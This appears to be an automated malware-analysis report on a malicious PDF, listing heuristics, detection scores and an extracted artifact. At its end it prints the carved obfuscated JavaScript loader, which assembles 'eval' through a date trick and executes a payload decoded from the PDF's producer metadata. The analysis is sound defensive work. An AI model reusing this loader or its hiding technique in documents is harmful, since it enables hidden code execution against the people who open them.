MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded and obfuscated JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. The script uses String.fromCharCode, suggesting an attempt to hide malicious code. The primary function of the embedded JavaScript appears to be downloading and executing a second-stage payload from a remote source, as evidenced by the extracted artifact javascript_obj0001_000.js. The obfuscation and download-and-execute pattern are common in malware delivery.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
dvar\(dvar\('String.fromCharCode\(' + zhdp + '\)'\)\); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.js |
pdf-javascript-stream | PDF /JS object 1 at offset 0x562D | 361 bytes |
SHA-256: 068bdad9b038b677489695be59b3962a2db2953f2d8e5ca8f93b8521c32951e0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
aokc = app;
ckck = new Date(2010,11,4);
var ibf='';
var ouyy = 'e'+ckck.getDay()+'a'+ibf+'l';
ouyy = ouyy.replace('6','v');
dvar=aokc[ouyy];
var ibf='';
dvar('va'+ibf+'r owj=th'+ibf+'i'+ibf+'s');
toc='pr' + ibf + ckck.getDay() + ibf + 'uc' +'er';
toc = toc.replace('6', 'od');
var zhdp = owj[toc];
dvar(dvar('String.fromCharCode(' + zhdp + ')'));
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.